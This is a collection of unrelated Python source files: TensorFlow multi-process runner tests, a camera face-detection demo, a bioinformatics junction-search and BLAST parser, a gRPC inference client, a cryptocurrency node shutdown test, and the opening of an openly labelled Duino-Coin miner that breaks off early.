mpr.terminate('worker', 0)
mpr.start_single_process('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, but a new worker 0 is added, so it
# should still have iteration 9 printed. Moreover, iteration 0 of worker 0
# should happen twice.
self.assertLen(
[s for s in std_stream_results if 'index 0, iteration 0' in s], 2)
self.assertIn('[worker-0]: index 0, iteration 9\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_streaming(self):
def proc_func():
for i in range(5):
logging.info('(logging) %s-%d, i: %d',
multi_worker_test_base.get_task_type(), self._worker_idx(),
i)
print(
'(print) {}-{}, i: {}'.format(
multi_worker_test_base.get_task_type(), self._worker_idx(), i),
flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2, num_ps=2, has_eval=True),
list_stdout=True)
mpr._dependence_on_chief = False
mpr.start()
mpr.start_single_process('worker', 2)
mpr.start_single_process('ps', 2)
mpr_result = mpr.join()
list_to_assert = mpr_result.stdout
for job in ['chief', 'evaluator']:
for iteration in range(5):
self.assertTrue(
any('(logging) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
for job in ['worker', 'ps']:
for iteration in range(5):
for task in range(3):
self.assertTrue(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
task = 3
self.assertFalse(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertFalse(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
def test_start_in_process_as(self):
def proc_func():
for i in range(5):
logging.info('%s-%d, i: %d', multi_worker_test_base.get_task_type(),
self._worker_idx(), i)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
list_stdout=True)
def eval_func():
time.sleep(1)
mpr.start_single_process(task_type='evaluator', task_id=0)
eval_thread = threading.Thread(target=eval_func)
eval_thread.start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
eval_thread.join()
list_to_assert = mpr.join().stdout
for job in ['worker', 'evaluator']:
for iteration in range(5):
self.assertTrue(
any('{}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
def test_terminate_all_does_not_ignore_error(self):
mpr = multi_process_runner.MultiProcessRunner(
proc_func_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
mpr.start()
time.sleep(60)
mpr.terminate_all()
with self.assertRaisesRegexp(ValueError, 'This is an error.'):
mpr.join()
def test_barrier(self):
multi_process_runner.run(
proc_func_with_barrier,
cluster_spec=multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
)
def test_barrier_called_in_main_process(self):
with self.assertRaises(ValueError):
multi_process_runner.barrier()
def test_stdout_available_when_timeout(self):
def proc_func():
logging.info('something printed')
time.sleep(10000) # Intentionally make the test timeout.
with self.assertRaises(multi_process_runner.SubprocessTimeoutError) as cm:
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(num_workers=1),
list_stdout=True)
mpr.start()
mpr.join(timeout=60)
mpr.terminate_all()
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('something printed' in line for line in list_to_assert))
def test_seg_fault_raises_error(self):
def proc_func_expected_to_seg_fault():
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
proc_func_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(num_workers=1),
list_stdout=True)
self.assertIn('Missing status(es) from 1 subprocess(es).',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(any('SIGSEGV' in line for line in list_to_assert))
def test_seg_fault_in_chief_raises_error(self):
def proc_func_expected_to_seg_fault():
if multi_worker_test_base.get_task_type() == 'worker':
time.sleep(10000)
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
proc_func_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
list_stdout=True)
self.assertIn('Subprocess chief-0 exited with exit code',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(any('SIGSEGV' in line for line in list_to_assert))
def test_non_zero_exit_code_raises_error(self):
def proc_func_expected_to_exit_with_1():
sys.exit(1)
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
proc_func_expected_to_exit_with_1,
multi_worker_test_base.create_cluster_spec(num_workers=1))
self.assertIn('Missing status(es) from 1 subprocess(es).',
str(cm.exception))
class MultiProcessPoolRunnerTest(test.TestCase):
def test_same_process_across_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(proc_func_that_returns_pid)
for _ in range(3):
self.assertAllEqual(runner.run(proc_func_that_returns_pid), pid)
def test_exceptions_in_sub_process(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(proc_func_that_returns_pid)
with self.assertRaisesRegexp(ValueError, 'This is an error.'):
runner.run(proc_func_that_errors)
self.assertAllEqual(runner.run(proc_func_that_returns_pid), pid)
def test_tf_config(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
result = runner.run(proc_func_that_adds_task_type_in_return_data)
job_count_dict = {'worker': 2, 'chief': 1}
for data in result:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['chief'], 0)
@unittest.expectedFailure
def test_exception_in_main_process(self):
# When there's an exception in the main process, __del__() is not called.
# This test is to verify MultiProcessPoolRunner can cope with __del__() not
# being called.
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
runner.run(proc_func_that_returns_pid)
raise ValueError('failure')
def test_initializer(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(
cluster_spec, initializer=lambda: proc_func_that_sets_global(1))
result = runner.run(proc_func_that_sets_global, args=(2,))
self.assertAllEqual(result, [1, 1])
if __name__ == '__main__':
multi_process_runner.test_main()
|
avnet_face_detection_mt.py
|
'''
Copyright 2020 Avnet Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
# USAGE
# python avnet_face_detection_mt.py [--input 0] [--detthreshold 0.55] [--nmsthreshold 0.35] [--threads 4]
import numpy as np
import argparse
import imutils
import time
import cv2
import os, errno
import sys
import threading
import queue
from imutils.video import FPS
import runner
from vitis_ai_vart.facedetect import FaceDetect
global bQuit
def taskCapture(inputId,queueIn):
global bQuit
#print("[INFO] taskCapture : starting thread ...")
# Start the FPS counter
fpsIn = FPS().start()
# Initialize the camera input
print("[INFO] taskCapture : starting camera input ...")
cam = cv2.VideoCapture(inputId)
cam.set(cv2.CAP_PROP_FRAME_WIDTH,640)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT,480)
if not (cam.isOpened()):
print("[ERROR] taskCapture : Failed to open camera ", inputId )
        sys.exit()
while not bQuit:
# Capture image from camera
ret,frame = cam.read()
# Update the FPS counter
fpsIn.update()
# Push captured image to input queue
queueIn.put(frame)
# Stop the timer and display FPS information
fpsIn.stop()
print("[INFO] taskCapture : elapsed time: {:.2f}".format(fpsIn.elapsed()))
print("[INFO] taskCapture : elapsed FPS: {:.2f}".format(fpsIn.fps()))
#print("[INFO] taskCapture : exiting thread ...")
def taskWorker(worker,dpu,detThreshold,nmsThreshold,queueIn,queueOut):
global bQuit
#print("[INFO] taskWorker[",worker,"] : starting thread ...")
# Start the face detector
dpu_face_detector = FaceDetect(dpu,detThreshold,nmsThreshold)
dpu_face_detector.start()
while not bQuit:
# Pop captured image from input queue
frame = queueIn.get()
# Vitis-AI/DPU based face detector
faces = dpu_face_detector.process(frame)
# loop over the faces
for i,(left,top,right,bottom) in enumerate(faces):
# draw a bounding box surrounding the object so we can
# visualize it
cv2.rectangle( frame, (left,top), (right,bottom), (0,255,0), 2)
# Push processed image to output queue
queueOut.put(frame)
# Stop the face detector
dpu_face_detector.stop()
# workaround : to ensure other worker threads stop,
# make sure input queue is not empty
queueIn.put(frame)
#print("[INFO] taskWorker[",worker,"] : exiting thread ...")
def taskDisplay(queueOut):
global bQuit
#print("[INFO] taskDisplay : starting thread ...")
# Start the FPS counter
fpsOut = FPS().start()
while not bQuit:
# Pop processed image from output queue
frame = queueOut.get()
# Display the processed image
cv2.imshow("Face Detection", frame)
# Update the FPS counter
fpsOut.update()
# if the `q` key was pressed, break from the loop
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
# Trigger all threads to stop
bQuit = True
# Stop the timer and display FPS information
fpsOut.stop()
print("[INFO] taskDisplay : elapsed time: {:.2f}".format(fpsOut.elapsed()))
print("[INFO] taskDisplay : elapsed FPS: {:.2f}".format(fpsOut.fps()))
# Cleanup
cv2.destroyAllWindows()
#print("[INFO] taskDisplay : exiting thread ...")
def main(argv):
global bQuit
bQuit = False
# Construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input", required=False,
help = "input camera identifier (default = 0)")
ap.add_argument("-d", "--detthreshold", required=False,
help = "face detector softmax threshold (default = 0.55)")
ap.add_argument("-n", "--nmsthreshold", required=False,
help = "face detector NMS threshold (default = 0.35)")
ap.add_argument("-t", "--threads", required=False,
help = "number of worker threads (default = 4)")
args = vars(ap.parse_args())
if not args.get("input",False):
inputId = 0
else:
inputId = int(args["input"])
print('[INFO] input camera identifier = ',inputId)
if not args.get("detthreshold",False):
detThreshold = 0.55
else:
detThreshold = float(args["detthreshold"])
print('[INFO] face detector - softmax threshold = ',detThreshold)
if not args.get("nmsthreshold",False):
nmsThreshold = 0.35
else:
nmsThreshold = float(args["nmsthreshold"])
print('[INFO] face detector - NMS threshold = ',nmsThreshold)
if not args.get("threads",False):
threads = 4
else:
threads = int(args["threads"])
print('[INFO] number of worker threads = ', threads )
# Initialize VART API
dpu = runner.Runner("/usr/share/vitis_ai_library/models/densebox_640_360")[0]
# Init synchronous queues for inter-thread communication
queueIn = queue.Queue()
queueOut = queue.Queue()
# Launch threads
threadAll = []
tc = threading.Thread(target=taskCapture, args=(inputId,queueIn))
threadAll.append(tc)
for i in range(threads):
tw = threading.Thread(target=taskWorker, args=(i,dpu,detThreshold,nmsThreshold,queueIn,queueOut))
threadAll.append(tw)
td = threading.Thread(target=taskDisplay, args=(queueOut,))
threadAll.append(td)
for x in threadAll:
x.start()
# Wait for all threads to stop
for x in threadAll:
x.join()
# Cleanup VART API
del dpu
if __name__ == "__main__":
main(sys.argv)
|
junctionf_gui.py
|
import os
import sys
import struct
import cPickle
import subprocess
from sys import platform as _platform
from collections import Counter
import threading
import multiprocessing
import functions.process as process
import functions.structures as sts
import libraries.joblib.parallel as Parallel
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class junctionf():
def __init__(self, f, p):
self.fileio = f
self.printio = p
self.process = process.process()
self.blast_pipe = None
self._spin = None
    def sigterm_handler(self, _signo, _stack_frame):
        if self.blast_pipe:
            self.blast_pipe.terminate()
        if self._spin:
            self._spin.stop()
        if self.blast_pipe is not None:
            # A Popen object cannot be compared to an int or formatted with
            # %d; report the terminated child's pid instead.
            print ">>> Terminated BLAST process (%d). Now Exiting Gracefully!" % self.blast_pipe.pid
            sys.stdout.flush()
        else:
            print ">>> All Processes Terminated. Exiting Gracefully!"
            sys.stdout.flush()
        sys.exit()
def _getjunction(self, begin):
var = ''
infile = open(os.path.join(os.curdir, "Y2Hreadme.txt"), 'r')
for line in infile:
if begin in line:
var = (next(infile))
infile.close()
return var
    def _get_unprocessed_files(self, file_list, suffix1, processed_list, suffix2):
        # file_list is mutated in place; breaking after each removal keeps the
        # inner iteration safe.
        for processed_file in processed_list:
            for f in file_list:
                if f.replace(suffix1, "") == processed_file.replace(suffix2, ""):
                    file_list.remove(f)
                    break
        return file_list
def junction_search(self, directory, junction_folder, input_data_folder, blast_results_folder,
blast_results_query, junctions_array, exclusion_sequence):
# junction_sequence = self._getjunction(">junctionseq")
        exclusion_sequence = exclusion_sequence.upper()  # upper() returns a new string; reassign it
jseqs = self._make_search_junctions(junctions_array)
print ">>> The primary, secondary, and tertiary sequences searched are:"
sys.stdout.flush()
unmapped_sam_files = self.fileio.get_sam_filelist(directory, input_data_folder)
print '>>> Starting junction search.'
sys.stdout.flush()
for f in unmapped_sam_files:
print '>>> File: ', f
sys.stdout.flush()
filename = os.path.join(directory, input_data_folder, f)
input_filehandle = open(filename)
input_file_size = os.path.getsize(filename)
output_filehandle = open(os.path.join(directory, junction_folder, f.replace(".sam", '.junctions.txt')), 'w')
# self._search_for_HA(input_file, junct1, junct2, junct3, exclusion_sequence, output_file, f, input_file_size)
# self._search_junctions(input_file, junction_sequence, output_file)
self._search_for_junctions(input_filehandle, jseqs, exclusion_sequence, output_filehandle, f, input_file_size)
output_filehandle.close()
input_filehandle.close()
self._multi_convert(directory, junction_folder, blast_results_folder)
def _multi_convert(self, directory, infolder, outfolder):
file_list = self.fileio.get_file_list(directory, infolder, ".txt")
print ' '
for f in file_list:
self.fileio.make_FASTA(os.path.join(directory, infolder, f),
os.path.join(directory, outfolder, f[:-4] + ".fa"))
def blast_search(self, directory, db_name, blast_results_folder, blast_results_query):
platform_specific_path = 'osx'
suffix = ''
if _platform == "linux" or _platform == "linux2":
platform_specific_path = 'linux'
elif _platform == "darwin":
platform_specific_path = 'osx'
elif _platform.startswith('win'):
platform_specific_path = 'windows'
suffix = '.exe'
bit_size = 'x' + str(struct.calcsize("P") * 8)
blast_path = os.path.join(os.curdir, 'ncbi_blast', 'bin', platform_specific_path, bit_size)
# self.fileio.check_path(os.curdir, blast_path, 'Cannot find relevant Blast programs in Resources folder')
blast_db = os.path.join(os.curdir, 'ncbi_blast', 'db')
# database_list = self.fileio.get_file_list(blast_db, ".fa")
# selection = select.Selection_Dialog()
# selection.windowTitle('Blast Database Selection')
# selection.populate_list(database_list)
# selection.exec_()
# selection.activateWindow()
# db_selection = selection.selection
db_path = os.path.join(blast_db, db_name)
print ">>> Selected Blast DB: %s" % db_name
sys.stdout.flush()
file_list = self.fileio.get_file_list(directory, blast_results_folder, ".fa")
for file_name in file_list:
output_file = os.path.join(directory, blast_results_folder, file_name.replace(".junctions.fa", '.blast.txt'))
print ">>> Running BLAST search for file: " + file_name
blast_command_list = [os.path.join(blast_path, 'blastn' + suffix),
'-query', os.path.join(directory, 'blast_results', file_name), '-db', db_path,
'-task', 'blastn', '-dust', 'no', '-num_threads', str(Parallel.cpu_count()),
'-outfmt', '7', '-out', output_file, '-evalue', '0.2', '-max_target_seqs', '10']
# blast_command = " ".join(blast_command_list)
sys.stdout.flush()
# os.system(blast_command)
self.blast_pipe = subprocess.Popen(blast_command_list, shell=False)
self.blast_pipe.wait()
def generate_tabulated_blast_results(self, directory, blast_results_folder, blast_results_query_folder, gene_list_file):
blast_list = self.fileio.get_file_list(directory, blast_results_folder, ".txt")
for blasttxt in blast_list:
print ">>> Parsing BLAST results file %s ..." % blasttxt
blast_dict, gene_dict = self._blast_parser(directory, blast_results_folder,
blasttxt, gene_list_file)
for gene in blast_dict.keys():
if gene not in ['total', 'pos_que']:
stats = {'in_orf' : 0, 'in_frame': 0, 'downstream': 0,
'upstream': 0, 'not_in_frame': 0,
'intron' : 0, 'backwards': 0, 'frame_orf': 0, 'total': 0
}
for nm in blast_dict[gene].keys():
for j in blast_dict[gene][nm]:
j.ppm = j.count * 1000000.0 / blast_dict['total']
stats[j.frame] += 1
stats[j.orf] += 1
if j.frame_orf:
stats["frame_orf"] += 1
stats['total'] += 1
blast_dict[gene]['stats'] = stats
blast_query_p = open(os.path.join(directory, blast_results_query_folder,
blasttxt.replace(".blast.txt", ".bqp")), "wb")
cPickle.dump(blast_dict, blast_query_p)
blast_query_p.close()
self.fileio.remove_file(directory, blast_results_folder,
self.fileio.get_file_list(directory, blast_results_folder, ".fa"))
def _junctions_in_read(self, read, jseqs):
match_index = -1
junction_index = -1
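        # Note: the loop does not break, so if several windows match the read,
        # the last matching window wins.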
for i, j in enumerate(jseqs):
if j in read:
match_index = read.index(j)
junction_index = i
return (junction_index, match_index)
def _search_for_junctions(self, input_filehandle, jseqs, exclusion_sequence, output_filehandle, f, input_file_size):
hits_count = 0
def check_matching_criteria(l, indexes, jseqs, read):
value = 0
if indexes[0] != -1:
junction = jseqs[indexes[0]]
downstream_rf = read[len(junction) + indexes[1] + (indexes[0] % 3) * 4:]
if len(downstream_rf) > 25:
if exclusion_sequence not in downstream_rf or exclusion_sequence == '':
value = 1
protein_sequence = self.process.translate_orf(downstream_rf)
output_filehandle.write(" ".join(l[:4]) + " " + l[9] + " " + downstream_rf
+ " " + protein_sequence + "\n")
return value
reads_count = 0
for line in input_filehandle:
line_split = line.strip().split()
if line_split[0][0] != "@" and line_split[2] == "*":
reads_count += 1
if reads_count % 5000 == 0:
sys.stdout.write('\rRead %.3f%% of file...' % (input_filehandle.tell() * 100.0 / input_file_size))
sys.stdout.flush()
sequence_read = line_split[9]
rev_sequence_read = self.process.reverse_complement(sequence_read)
fwd_indexes = self._junctions_in_read(sequence_read, jseqs)
hit = check_matching_criteria(line_split, fwd_indexes, jseqs, sequence_read)
if hit == 0:
rev_indexes = self._junctions_in_read(rev_sequence_read, jseqs)
hit = check_matching_criteria(line_split, rev_indexes, jseqs, rev_sequence_read)
hits_count += hit
def _make_search_junctions(self, junctions_array):
jseqs = []
for junc in junctions_array:
# jseqs.append(junc[35:50]) These are 15 bp junctions
# jseqs.append(junc[31:46])
# jseqs.append(junc[27:42])
jseqs.append(junc[30:50])
jseqs.append(junc[26:46])
jseqs.append(junc[22:42])
return jseqs
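    # Worked example (assumed 50 bp junction strings): the three staggered
    # 20 bp windows above are junc[30:50], junc[26:46] and junc[22:42], each
    # shifted by 4 bp; this pairs with the (index % 3) * 4 offset used in
    # _search_for_junctions to recover the downstream reading frame.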
def _get_accession_number_list(self, gene_list_file):
fh = open(os.path.join('lists', gene_list_file), 'r')
gene_list = {}
for line in fh.readlines():
split = line.split()
gene_list[split[0]] = {'gene_name' : split[1],
'orf_start' : int(split[6]) + 1,
'orf_stop' : int(split[7]),
'mRNA' : split[9],
'intron' : split[8],
'chromosome': split[2]
}
        fh.close()
        return gene_list
def _blast_parser(self, directory, infolder, fileName, gene_list_file):
blast_results_handle = open(os.path.join(directory, infolder, fileName), 'r')
gene_list = self._get_accession_number_list(gene_list_file)
blast_results_count = 0
print_counter = 0
previous_bitscore = 0
results_dictionary = {}
gene_dict = {}
collect_results = 'n'
for line in blast_results_handle.readlines():
line = line.strip()
split = line.split()
if "BLASTN" in line:
blast_results_count += 1
print_counter += 1
previous_bitscore = 0
if print_counter == 90000:  # this block exists purely for progress output
sys.stdout.write('.')
print_counter = 0
elif "hits" in line and int(split[1]) < 100: # limits number of blast hits for single read to less than 100
collect_results = 'y'
elif split[0] != '#' and collect_results == 'y' and float(split[2]) > 98 and \
float(split[11]) > 50.0 and float(split[11]) > previous_bitscore:
previous_bitscore = float(split[11]) * 0.98
nm_number = split[1]
gene_name = gene_list[nm_number]['gene_name']
if gene_name not in gene_dict.keys():
gene_dict[gene_name] = [nm_number]
else:
gene_dict[gene_name].append(nm_number)
j = sts.jcnt()
j.position = int(split[8])
j.query_start = int(split[6])
fudge_factor = j.query_start - 1
frame = j.position - gene_list[nm_number]['orf_start'] - fudge_factor
if frame % 3 == 0:
j.frame = "in_frame"
else:
j.frame = "not_in_frame"
if gene_list[nm_number]['intron'] == "INTRON":
j.frame = "intron"
if int(split[9]) - j.position < 0:
j.frame = "backwards"
if j.position < gene_list[nm_number]['orf_start']:
j.orf = "upstream"
elif j.position > gene_list[nm_number]['orf_stop']:
j.orf = "downstream"
else:
j.orf = "in_orf"
if j.frame == 'in_frame' and j.orf == 'in_orf':
j.frame_orf = True
if gene_name not in results_dictionary.keys():
results_dictionary[gene_name] = {}
results_dictionary[gene_name][nm_number] = [j]
else:
if nm_number not in results_dictionary[gene_name].keys():
results_dictionary[gene_name][nm_number] = []
junction_present = False
junction_index = 0
for index, pj in enumerate(results_dictionary[gene_name][nm_number]):
if pj.position == j.position and pj.query_start == j.query_start:
junction_index = index
junction_present = True
if junction_present:
results_dictionary[gene_name][nm_number][junction_index].count += 1
else:
results_dictionary[gene_name][nm_number].append(j)
else:
collect_results = 'n'
results_dictionary['total'] = blast_results_count
blast_results_handle.close()
return results_dictionary, gene_dict
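# Frame call used above, spelled out: a hit is "in_frame" when
# (position - orf_start - (query_start - 1)) % 3 == 0, i.e. the first
# aligned base of the read falls on a codon boundary of the annotated ORF;
# "intron" and "backwards" then override that call for intron-containing
# genes and for hits whose subject coordinates decrease.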
# def _search_junctions(self, infile, junction_sequence, outfile):
# def longest_common_substring(s1, s2):
# m = [[0] * (1 + len(s2)) for i in xrange(1 + len(s1))]
# longest, x_longest = 0, 0
# for x in xrange(1, 1 + len(s1)):
# for y in xrange(1, 1 + len(s2)):
# if s1[x - 1] == s2[y - 1]:
# m[x][y] = m[x - 1][y - 1] + 1
# if m[x][y] > longest:
# longest = m[x][y]
# x_longest = x
# else:
# m[x][y] = 0
# return s1[x_longest - longest: x_longest]
# reads = 0
# iterations = 0
# reverse_junction_sequence = self.process.reverse_complement(junction_sequence)
# for line in infile.readlines():
# split = line.split()
# if split[0][0] != '@' and split[2] == '*':
# read = split[9]
# reads += 1
# iterations += 1
# if iterations == 5000:
# iterations = 0
# sys.stdout.write('.', )
# sys.stdout.flush()
# substring = longest_common_substring(junction_sequence, read)
# rev_substring = longest_common_substring(reverse_junction_sequence, read)
# jloc = junction_sequence.find(substring) + len(substring)
# jloc_rev = reverse_junction_sequence.find(rev_substring) + len(rev_substring)
# rloc = read.find(substring) + len(substring) + len(junction_sequence) - jloc
# rloc_rev = read.find(reverse_junction_sequence) + len(rev_substring) + \
# len(reverse_junction_sequence) - jloc_rev
#
# if jloc >= len(junction_sequence) - 1 and len(read) - rloc > 25 and len(substring) > 15:
# outfile.write(str(split[0]) + " "
# + str(split[1]) + " "
# + str(split[2]) + " "
# + str(split[3]) + " "
# + str(split[9]) + " "
# + read[rloc:] + " "
# + self.process.translate_orf(read[rloc:]) + "\n")
# continue
#
# if jloc_rev >= len(reverse_junction_sequence) - 1 and len(read) - rloc_rev > 25 and len(rev_substring) > 15:
# outfile.write(str(split[0]) + " "
# + str(split[1]) + " "
# + str(split[2]) + " "
# + str(split[3]) + " "
# + str(split[9]) + " "
# + read[rloc_rev:] + " "
# + self.process.translate_orf(read[rloc_rev:]) + "\n")
# def _search_for_HA(self, infile, primaryJunct, secondaryJunct, tertiaryJunct, exclusion_sequence, OutFile, f,
# input_file_size):
# HA = primaryJunct
# HArev = self.process.reverse_complement(HA)
# HA2 = secondaryJunct
# HA2rev = self.process.reverse_complement(HA2)
# HA3 = tertiaryJunct
# HA3rev = self.process.reverse_complement(HA3)
# Hits2 = 0
# Hits = 0
# reads = 0
# iterations = 0
# toggle = 0
# self.printio.print_progress(f, 0, 0, 0, 1)
# for line in infile:
# line.strip()
# splitLine = line.split()
# if splitLine[0][0] != '@' and splitLine[2] == '*':
# reads += 1
# iterations += 1
# if iterations == 5000:
# iterations = 0
# sys.stdout.write('\rRead %.3f%% of file...' % (infile.tell() * 100.0 / input_file_size))
# sys.stdout.flush()
#
# if HA in splitLine[9] or HArev in splitLine[9] or HA2 in splitLine[9] or \
# HA2rev in splitLine[9] or HA3 in splitLine[9] or HA3rev in splitLine[9]:
# Hits += 1
# if HA in splitLine[9]:
# HAindex = splitLine[9].index(HA)
# DSRF = splitLine[9][(HAindex + len(HA)):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HArev in splitLine[9]:
# HARevCom = self.process.reverse_complement(splitLine[9])
# HAindex = HARevCom.index(HA)
# DSRF = HARevCom[(HAindex + len(HA)):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA2 in splitLine[9]:
# HA2index = splitLine[9].index(HA2)
# DSRF = splitLine[9][(HA2index + len(HA2) + 4):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA2rev in splitLine[9]:
# HARevCom = self.process.reverse_complement(splitLine[9])
# HA2index = HARevCom.index(HA2)
# DSRF = HARevCom[(HA2index + len(HA2) + 4):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA3 in splitLine[9]:
# HA3index = splitLine[9].index(HA3)
# DSRF = splitLine[9][(HA3index + len(HA3) + 8):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA3rev in splitLine[9]:
# HARevCom = self.process.reverse_complement(splitLine[9])
# HA3index = HARevCom.index(HA3)
# DSRF = HARevCom[(HA3index + len(HA3) + 8):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# if toggle == 1:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# OutFile.write(str(splitLine[0]) + " " + str(splitLine[1]) + " " + str(splitLine[2]) + " " + str(
# splitLine[3]) + " " + str(splitLine[9]) + " " + DSRF + " " + Protein + "\n")
# toggle = 0
|
inference_request.py
|
import grpc
import time
import json
import sys
from arch.api.proto import inference_service_pb2
from arch.api.proto import inference_service_pb2_grpc
import threading
def run(address):
ths = []
with grpc.insecure_channel(address) as channel:
for i in range(1):
th = threading.Thread(target=send, args=(channel, ))
ths.append(th)
st = int(time.time())
for th in ths:
th.start()
for th in ths:
th.join()
et = int(time.time())
print("finished in {}s".format(et - st))
def send(channel):
stub = inference_service_pb2_grpc.InferenceServiceStub(channel)
request = inference_service_pb2.InferenceRequest()
request.local.role = 'guest'
request.local.partyId = 9999
request.role['guest'].partyId.append(9999)
request.role['host'].partyId.append(10000)
request.role['arbiter'].partyId.append(10000)
request.sceneId = 50000
data = {}
data["123456"] = {}
data["123456"]["fid1"] = 5.1
data["123456"]["fid2"] = 6.2
data["123456"]["fid3"] = 7.6
request.data = json.dumps(data).encode(encoding="utf-8")
response = stub.predict(request)
print(response)
if __name__ == '__main__':
run(sys.argv[1])
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test monkecoind shutdown."""
from test_framework.test_framework import MonkecoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(MonkecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
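# (2 = the long-running waitfornewblock above plus this getrpcinfo call.)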
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner v2.7 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
